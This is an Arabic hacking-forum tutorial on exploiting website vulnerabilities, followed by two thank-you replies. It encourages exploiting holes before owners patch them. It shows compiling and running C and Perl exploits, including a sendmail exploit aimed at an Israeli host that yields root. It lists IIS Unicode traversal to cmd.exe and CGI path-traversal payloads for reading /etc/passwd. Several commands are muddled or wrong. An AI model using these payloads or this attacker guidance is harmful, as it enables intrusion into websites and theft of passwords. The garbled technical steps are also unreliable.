س.ماهي الثغرات ومامعناها الثغرات هي ضعف امني يساعد في دخول النظام معين واختراقه وقد تكون أيضا الطريقه المساعدة التي تخليك تتحول من user الي administrator يعني من مستخدم الي المدير المتصرف وتتضمن ويجب علي الدوام معرفه الثغرات الامنيه الجديدة واستثمارها علشان لا ينتبه أصحاب المواقع بها يرقعوها يتم تقفيلها واقرب مثال لهذه الثغرات الضعف الأمني الذي اكتشف في الاباتشي وهو سيرفر يركب علي نظام ليونكس واي ضعف في احد البرامج او قاعدة بناء الموقع تعتبر ثغرة ومن الممكن استخدمها والاستفاده منها في اختراق الموقع المراد اختراقه والتحكم في الموقع ومشاهدة الباسوردات وكل ماتريد عن طريقها كيف استثمر الثغره اذا لقيتها من وقت ما اكتشفوا الثغرات كانت نسبه 99% من الثغرات تكون سكربتا تها مكتوبه بالغه c وتحتاج لمعرفة اللغه او عليك تحويلها كما ان هناك العديد من الثغرات تحتاج الي shell حتي تتمكن من الاستفاده من هذه الثغره او بمعني اخر الضعف وعلي سبيل المثال بعض الثغرات الموجوده في PHP تحتاج الي shell PHP الضعف يكون في الاصدارت الخاصه فيع ثغره من نوع Kernel 2.2.x ولكن هذه المره في نظام تشغيل ليونكس ملاحظه هذه الثغرات تكون بالغه c تكون سيكربتات توجد في الموقع وهناك أيضا سيكربتات اخري مكتوبه بالغه perl لازم تكون في هذه الحاله مركب لوينكس علشان الأوامر وانصح تركيب Linux Redhat 7.3 لانه افضل من الماند ريك والماندريك صوره مبسطه للريدهات غير قابل للتطور وان الريد هات اقوي طريقه تحويل لغه البيرل الطريقه سهله كلها أوامر في البدايه تكتب هذا الامر ./ lp.file يعطيك هذه الرساله Access Denied هذه الرساله توضح عدم الموافقه اذا صار لك كذا تكتب الامر chmod + x conik.pl لاحظ مكان كونيك تكتب اسم الملف وشغله مره ثانيه وشوف النتيجه راح تكون زي كذا $./conik.pl ولغه c تحويل الملف لازم انت تخلي الملف يكون ملف تنفيذي بالامر التالي gcc-o conik conik.c وراح يكون الملف جاهز بعد هذا الامر ./conik.c وبعد ماصار الملف جاهز gcc -o sendmail.c$ ./sendemmail $ usage:sendmail <host> <os > user password $./ sendmail smtp.israel.com RedHat-7.3 anonymous anonymous----- تكتب الموقع اللي تبغاه مكان Israel connecting to host connected... id uid=0 root gid=0 root لاحظ انه طلب منا الملقم للبرنامج sendemail وطلب نظام التشغيل واليوز والباسورد واعطنا البرنامج امتياز root بسب قيام البرنامج بتنفيذ Exan nofer لاتظن ان لما حطيت البرنامج xxx.sendmail بدون أي سبب انا حطيت للك هذا المثال لانه هناك ثغره في هذ البرنامج وراح اشرحها ان شاء الله ابيك تحفظ الاسم ماهي conik هذا الطريقه يبي لها نظام تشغيل ولغه c و perl ؟ ثغرة تستخدم من خلال المتصفح يعني انت تشوف معلومات الموقع عبر المتصفح وتوصل الي ملف الباسوردات من هذه الطريقه ومثال علي هذه الثغرات PHP-CGI-UNICODE-VB-ETC UNICODE هي عباره عن ضعف في نظام IIS في Microsoft تساعد في اختراق الموقع بكل سهوله هذي طريقة الاختراق بهاذي الطريقه امثله علي ثغرت UNICODE /-vti -bin/..%25%35%63..0%25%35%36..25%35%36%..25%35%36..%25% 35%36%../winnt/system32/cmd.exe? c+dir+c:/ اما ثغرات CGI مثال cgi-bin/view-source?../../../../../../../etc/passwd cgi-bin/phf cgi-bin/wwwboard.pl cgi-bin/AT-admin.cgi هذا ما استطعت تقديمه من درس اختراق الهاك لاختراق المواقع السميم /هكرز الصحراء
شكراا لك واصل
العفوااا انتظر جديدي
قوانين المنتدى
